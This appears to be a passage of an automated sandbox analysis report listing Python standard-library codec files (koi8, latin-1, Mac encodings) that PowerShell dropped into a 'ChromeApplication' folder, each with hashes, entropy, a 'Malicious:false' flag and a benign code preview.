                                                                                                                                                                                                  Preview:#..# johab.py: Python Unicode Codec for JOHAB..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('johab')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='johab',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\koi8_r.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14086
                                                                                                                                                                                                  Entropy (8bit):4.696171438355166
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:veHhsuOTDvRnUrXPLouhIAs2+i4bur6Zv8muyEdP:vrT5uhIAl/euxP
                                                                                                                                                                                                  MD5:75872A24381833D8B71D42A66523AA45
                                                                                                                                                                                                  SHA1:C4AC11C4903178821FE680C732462C02626C016B
                                                                                                                                                                                                  SHA-256:90A883B291D5F1E6DBB735413D51648C31580B1927500161C16624836D01E5EE
                                                                                                                                                                                                  SHA-512:A84BD3BDBC4BCBFE90B550CB4FFB6CDBEBBB4B1C3824A931CBA448E84C79D4D6B05D9D67C0718FA97F790B8C1071C775010058306BCEC2769D4E721808CED8FF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec koi8_r generated from 'MAPPINGS/VENDORS/MISC/KOI8-R.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='koi8-r',.. encode=

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\koi8_t.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13501
                                                                                                                                                                                                  Entropy (8bit):4.664370116157909
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ahsuOTDvRNUrXPLouhIAs2+imIzDCYPfuyEdP:fTLuhIAl5jfuxP
                                                                                                                                                                                                  MD5:B2F96B9A1CF37B7C81BE8704D4E62EF9
                                                                                                                                                                                                  SHA1:AB37BF387BF19A833126952D139E41093DD217D9
                                                                                                                                                                                                  SHA-256:86D922A935AFDE1BD7C22CF8A9F23A237511C92C51509A80051DD2862A84D09F
                                                                                                                                                                                                  SHA-512:F139A2AAB199BB95905B6C020A6410D9FC1C67486BB8AF7796CE41BCC8CDE7AE034749F50728162BE836AE2D4ED74D4ED82282EE56517843C404412C72756ECE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec koi8_t.."""..# http://ru.wikipedia.org/wiki/...-8..# http://www.opensource.apple.com/source/libiconv/libiconv-4/libiconv/tests/KOI8-T.TXT....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return c

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\koi8_u.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14069
                                                                                                                                                                                                  Entropy (8bit):4.689466302139651
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:SHhsuOTDvR6UrXPLouhIAs2+i4bur6e9zuyEdP:fTIuhIAl/5uxP
                                                                                                                                                                                                  MD5:211B71B4C717939EDEDBFD33A9C726BE
                                                                                                                                                                                                  SHA1:64DEB95FD1A59EC03B09643BE2F2055A079151E4
                                                                                                                                                                                                  SHA-256:9F77F72F8A42A1BA97C7D53AFDB6F6A6D4E08707CAA4D4CD57D6C113156BB32B
                                                                                                                                                                                                  SHA-512:3CBACB39A0994C5285E5B0316B3816916D43C6EE607398022B7BF05430A9621416C2F28A848C2E90B47BE147DDFFB7CF03D5CE8C129BFE52247D6AA238FF5639
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec koi8_u generated from 'python-mappings/KOI8-U.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='koi8-u',.. encode=Codec(

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\kz1048.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14030
                                                                                                                                                                                                  Entropy (8bit):4.572243714560591
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Mn/GuINDBTXqJPnXEeXGyQCmEYcrj6CbwK+avSMcdgF:LNneXGy1lHwK+avSMNF
                                                                                                                                                                                                  MD5:F4729A1242BD140B732D4BEE6E137558
                                                                                                                                                                                                  SHA1:44EFA222BB2CA9ADD776C29A098F9F03FF03E515
                                                                                                                                                                                                  SHA-256:DA8BAC477F14620D8AA89EB6CB8963602E1C39724148369C88EF48C95D495011
                                                                                                                                                                                                  SHA-512:F5812E38B06620752A557FA70F207AA3298A2FEC7598107BCE749F5B1529A8CA92CAC5AD72E068F6F711C714868389861E93B25B484FA2AD13FC8B3A50EE797E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec kz1048 generated from 'MAPPINGS/VENDORS/MISC/KZ1048.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self, input, errors='strict'):.. return codecs.charmap_encode(input, errors, encoding_table).... def decode(self, input, errors='strict'):.. return codecs.charmap_decode(input, errors, decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input, self.errors, encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input, self.errors, decoding_table)[0]....class StreamWriter(Codec, codecs.StreamWriter):.. pass....class StreamReader(Codec, codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='kz1048',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\latin_1.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1314
                                                                                                                                                                                                  Entropy (8bit):4.724793488479122
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:J4OSEHV0yWJyWKMufQ2hQZUQWSJzWSJDtyWVyWg9ZKj9b1QJxFplR:J4OSJui6SJ6SJ8TKnQJxTz
                                                                                                                                                                                                  MD5:92C4D5E13FE5ABECE119AA4D0C4BE6C5
                                                                                                                                                                                                  SHA1:79E464E63E3F1728EFE318688FE2052811801E23
                                                                                                                                                                                                  SHA-256:6D5A6C46FE6675543EA3D04D9B27CCCE8E04D6DFEB376691381B62D806A5D016
                                                                                                                                                                                                  SHA-512:C95F5344128993E9E6C2BF590CE7F2CFFA9F3C384400A44C0BC3ACA71D666ED182C040EC495EA3AF83ABBD9053C705334E5F4C3F7C07F65E7031E95FDFB7A561
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'latin-1' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.latin_1_encode.. decode = codecs.latin_1_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.latin_1_encode(input,self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.latin_1_decode(input,self.errors)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....class StreamConverter(StreamWriter,StreamReader):.... encode = codecs.latin_1_decode.. decode = codecs.latin_1_encode....### encodings module API..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mac_arabic.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):37165
                                                                                                                                                                                                  Entropy (8bit):4.736863402692657
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:RakostECDXJVf+hiOjiU6Q3DBEQ12yWQZr75CAwKC1/h:Ukost5LX2htjN6QT682PQx5PwVJ
                                                                                                                                                                                                  MD5:C269925332C46C7A774FBFCAD74F4B66
                                                                                                                                                                                                  SHA1:5F9542A16C83A7EE831F320507BD87756B398DCF
                                                                                                                                                                                                  SHA-256:F5C262F930F3B7D83466283347F8B0D7B5C7CBF18DD6FCEB4FAF93DBCD58839E
                                                                                                                                                                                                  SHA-512:5BAE57045F650E062EAEA05106F726A0C9B29409CA6CD9667338473DF8CA779BE8965C5F8BD5D87B2DDB76024794AFFC92FF98850D0D0161269133AC3B2F7825
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/APPLE/ARABIC.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-arabic',.. encode=Codec().encode,

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mac_croatian.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13940
                                                                                                                                                                                                  Entropy (8bit):4.577897629122807
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wHhsuOTDvRI7ZpouhIAs2+iy2w4kN8gzeqBwHr+:tTZuhIAl+4E16ap
                                                                                                                                                                                                  MD5:C3FC8C5389BFDF1371B849C38FE1A20C
                                                                                                                                                                                                  SHA1:009654FD007C938E2FC889B64954FD139EE051E8
                                                                                                                                                                                                  SHA-256:68539CA54FFD5D96C07F3590E720D8A28009CB7CAA13E607AC3084D19DD5A19A
                                                                                                                                                                                                  SHA-512:8F81FD2106ED43E0CE34004576ED99D77FB6766EC6B757EB4F8B815742E86F90C36CDBAF19E9C3BE3D4F2B92B94695D014721C4A2D7E22312155BE7FBA1164BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_croatian generated from 'MAPPINGS/VENDORS/APPLE/CROATIAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-croatian',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mac_cyrillic.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13761
                                                                                                                                                                                                  Entropy (8bit):4.613646718299373
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:8HhsuOTDvRA7ZpouhIAs2+i4Xm8jLPeqBap+f:pTduhIAl+mmia1f
                                                                                                                                                                                                  MD5:69AF178D83304D0AB6260D64CC9C734F
                                                                                                                                                                                                  SHA1:AA73ADF92F5762F559B26C9858590AA750D4F25F
                                                                                                                                                                                                  SHA-256:AC11E1F54789AFF782D79FE7D6FD52183EF0F57B6AC4A0F680353FE0113F0D4D
                                                                                                                                                                                                  SHA-512:A42B7C7CD5E6AE157B1DCE131264C353DF0FF6FEA09B06D1498EF07931D94D91C48D311964E0F35D4DF893CE65BFD5F3339BB9E1541DFBE2A2FEED25A478E9F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_cyrillic generated from 'MAPPINGS/VENDORS/APPLE/CYRILLIC.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-cyrillic',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mac_farsi.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15477
                                                                                                                                                                                                  Entropy (8bit):4.803106966743048
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:4HhsuOTDvRe7Zt+/UxcXwz1BhFouhCuMQ+iujx5zCdxeiu5iEpkHzWO0yfZBcsWR:FTPuhCuj6fHmHzp03
                                                                                                                                                                                                  MD5:46E0758A4DF808F2649BD6B7262362BA
                                                                                                                                                                                                  SHA1:A647995DAE668E9D2EDF34529CF1DDDD06AC8016
                                                                                                                                                                                                  SHA-256:B0F1FA8399AD1844EF5F07ACFCD523585AB576F411D845A008A610FF6A25AD31
                                                                                                                                                                                                  SHA-512:ABB217D00013E01B89855773B9CA728F2F0D14C9E3A7F4CC705588D458CB06E93A6FC187F87FD084F78E0668094324F9D0857D58CFC68D04A8883C8973BB6A77
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_farsi generated from 'MAPPINGS/VENDORS/APPLE/FARSI.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-farsi',.. e

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mac_greek.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14028
                                                                                                                                                                                                  Entropy (8bit):4.6264619578502515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:WlHhsuOTDvRT7ZpouhIAs2+iEh+GsHlIu/lwqBxTj/Fq3FHEj:rTCuhIAl6+GeJ/Wa3QVQ
                                                                                                                                                                                                  MD5:338143EC1BC5F5DDE251657BECC4667A
                                                                                                                                                                                                  SHA1:E68BFEAB6E5209748AC47B44505E6CA581141647
                                                                                                                                                                                                  SHA-256:4C67D361F922B611213FD8FEB9FCAAA9FF8CB57CD961F1CA1B5CF4483B1DEE66
                                                                                                                                                                                                  SHA-512:D58D0F6309FCF945FF25F7B5D825E8BAB1BFBDB40490110ADBA51B587AED5BE101A22C22CA99B9A4FF9B355F8E7980A713EA6CDD550403B37915EB79796E8A39
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_greek generated from 'MAPPINGS/VENDORS/APPLE/GREEK.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-greek',.. e

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mac_iceland.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13805
                                                                                                                                                                                                  Entropy (8bit):4.569004919357403
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:+HhsuOTDvRB7ZpouhIAs2+iy2wkKY2gKPeqBamec6U6+8:LTcuhIAl+k3LFam
                                                                                                                                                                                                  MD5:8FF7EE70CFFA2B336AEE3367796C96ED
                                                                                                                                                                                                  SHA1:1F26D1C59F9A124AD334FB2BB3FC1E3D605587FA
                                                                                                                                                                                                  SHA-256:64DE55FD0EA0FE4D2512B2303DCB3D20CC57061D78D08A11D3AA6F19E1877826
                                                                                                                                                                                                  SHA-512:6D0A64EBFA6F29FD5317043F9C08D0D1F68A39B6640615B2EF093C99629479CE8562C29AEA6509E2FEB255BFE93D0E9FCE9FB1DB43F86F17FE366ADC2788FC7F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_iceland generated from 'MAPPINGS/VENDORS/APPLE/ICELAND.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-iceland',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mac_latin2.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14430
                                                                                                                                                                                                  Entropy (8bit):4.621572363853459
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:S3hsuOTDvRNUrXPLouhIAs2+iDK19L4vJPeqB48:hTnuhIAlmP4EaD
                                                                                                                                                                                                  MD5:BAF2B9E09D011F78EA36ED2CC5ED22FD
                                                                                                                                                                                                  SHA1:77B62918E1FAFD837EEE086C552265384BB506B4
                                                                                                                                                                                                  SHA-256:74C9045009FABFFA3E81B5B41D97A85860BA42D109DB6673A276EA8BA9B59E56
                                                                                                                                                                                                  SHA-512:5FB69F8A5FB424B7872B3872CB75B3B538A35533BFE8F8AFFEC44D82B372C866D1841B2568680ACB954CEB696A92EE3091DC06F04EA89DB5651F35F5667B6DA1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_latin2 generated from 'MAPPINGS/VENDORS/MICSFT/MAC/LATIN2.TXT' with gencodec.py.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY...(c) Copyright 2000 Guido van Rossum....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(C

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mac_roman.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13787
                                                                                                                                                                                                  Entropy (8bit):4.580644681215749
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wHhsuOTDvR27ZpouhIAs2+iy2w4KY2gKPeqBaoG5:tT/uhIAl+43LFaW
                                                                                                                                                                                                  MD5:1F99EDC6D4A3BA200295364C52D6038D
                                                                                                                                                                                                  SHA1:8FD1FF1EEC2F74907935621572360E7E53FE7038
                                                                                                                                                                                                  SHA-256:6BF6FDE10F2350232DE5EE47D27CAE885362602443B59A924DE8EB6998B18BB2
                                                                                                                                                                                                  SHA-512:2924BFF1C570128D57711F91CE1A87B5D156A24144FA3FEBDDDF6C9BB7B82570FB1F9B9FB1C5D23CD9625BF5568F42B718DB3A432F35B47DFF9E72FAE199EA56
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_roman generated from 'MAPPINGS/VENDORS/APPLE/ROMAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-roman',.. e

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mac_romanian.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13968
                                                                                                                                                                                                  Entropy (8bit):4.599704767840293
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:FqHhsuOTDvR+7ZpouhIAs2+iy2w4kyYpDgKPeqBaj5:FHTvuhIAl+4cqFaI
                                                                                                                                                                                                  MD5:425337635E74A8B98CD770F43848AF18
                                                                                                                                                                                                  SHA1:C0F5A92D564177C49E76471117E4B521FD52DF17
                                                                                                                                                                                                  SHA-256:1DE13F2703A62479C4312F9A39514C7691CF7F737958B3915AF395A53A596183
                                                                                                                                                                                                  SHA-512:853EC8BEB168F69C36AEA83AE221AEADE920DD293928B6F9F61F8938955DF3C709169424D93F49EE05CE2C1AD487CE925808CB136CA91C5022BAD6404008AF6A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_romanian generated from 'MAPPINGS/VENDORS/APPLE/ROMANIAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-romanian',..

